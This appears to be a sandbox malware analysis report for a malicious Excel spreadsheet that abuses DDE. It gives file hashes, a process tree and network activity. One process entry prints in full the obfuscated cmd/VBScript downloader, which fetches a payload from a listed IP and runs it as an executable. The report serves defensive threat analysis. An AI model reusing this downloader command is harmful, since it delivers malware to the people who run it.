File name: | 0889264f3e4d08c5f794a156de02624bca3c01f0b921042e2245f168767dd48e.xls |
Full analysis: | https://app.any.run/tasks/884603c6-15bf-4b0a-8a83-104420253235 |
Verdict: | Malicious activity |
Analysis date: | April 25, 2019, 01:51:12 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-excel |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, Code page: 1251, Last Saved By: google, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Nov 18 03:33:42 2009, Last Saved Time/Date: Wed Apr 24 04:32:14 2019, Security: 0 |
MD5: | CB86E9667EB9C638C1CB160ADB9CA788 |
SHA1: | 5EBAAC8906EB78730C66EB687A407AE3A9F01AFA |
SHA256: | 0889264F3E4D08C5F794A156DE02624BCA3C01F0B921042E2245F168767DD48E |
SSDEEP: | 768:t8ow146iDUP10uOLlxILok6VeBWcu6n/dgAZjA8vp9f68rnd:Xw146iDUP10uOLlxILok6VeBWcln/dgi |
.xls | | | Microsoft Excel sheet (48) |
---|---|---|
.xls | | | Microsoft Excel sheet (alternate) (39.2) |
LastModifiedBy: | |
---|---|
Software: | Microsoft Excel |
CreateDate: | 2009:11:18 03:33:42 |
ModifyDate: | 2019:04:24 03:32:14 |
Security: | None |
CodePage: | Windows Cyrillic |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: |
|
HeadingPairs: |
|
CompObjUserTypeLen: | 26 |
CompObjUserType: | ???? Microsoft Excel 2003 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2580 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
3192 | CMd /c cd %TEMP% & @ECHO B4c= "http://185.251.38.91/foto.jpg">>K5i.VBS &@ECHO M8d = Y0k("RUXQ:QdQ")>>K5i.VBS &@ECHO Set N5g = CreateObject(Y0k("Y_dYX>:dYXT``\"))>>K5i.VBS &@ECHO N5g.Open Y0k("SQ`"), B4c, False>>K5i.VBS &@ECHO N5g.send ("")>>K5i.VBS &@ECHO Set L0p = CreateObject(Y0k("MP[PN:_`^QMY"))>>K5i.VBS &@ECHO L0p.Open>>K5i.VBS &@ECHO L0p.Type = 1 >>K5i.VBS &@eCHo L0p.Write N5g.ResponseBody>>K5i.VBS &@ECHO L0p.Position = 0 >>K5i.VBS &@ECHO L0p.SaveToFile M8d, 2 >>K5i.VBS &@ECHO L0p.Close>>K5i.VBS &@ECHO function Y0k(D0r) >> K5i.VBS &@ECHO For K5x = 1 To Len(D0r) >>K5i.VBS &@ECHO O1u = Mid(D0r, K5x, 1) >>K5i.VBS &@ECHO O1u = Chr(Asc(O1u)- 12) >>K5i.VBS &@ECHO I5b = I5b + O1u >> K5i.VBS &@ECHO Next >>K5i.VBS &@ECHO Y0k = I5b >>K5i.VBS &@ECHO End Function >>K5i.VBS & K5i.VBS &dEl K5i.VBS & tIMeOUT 13 & FILE.EXE | C:\Windows\system32\CMd.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1512 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\K5i.VBS" | C:\Windows\System32\WScript.exe | CMd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
3272 | tIMeOUT 13 | C:\Windows\system32\timeout.exe | — | CMd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: timeout - pauses command processing Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2580 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR63DC.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3192 | CMd.exe | C:\Users\admin\AppData\Local\Temp\K5i.VBS | text | |
MD5:FEE0BA8CBE7A67F4967884AEF523A4C5 | SHA256:A38C58BCB673A1864F18805494FBC3AE02AC9470479FF3A1A420FD748986DC9A |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1512 | WScript.exe | GET | — | 185.251.38.91:80 | http://185.251.38.91/foto.jpg | unknown | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
— | — | 185.251.38.91:80 | — | — | — | malicious |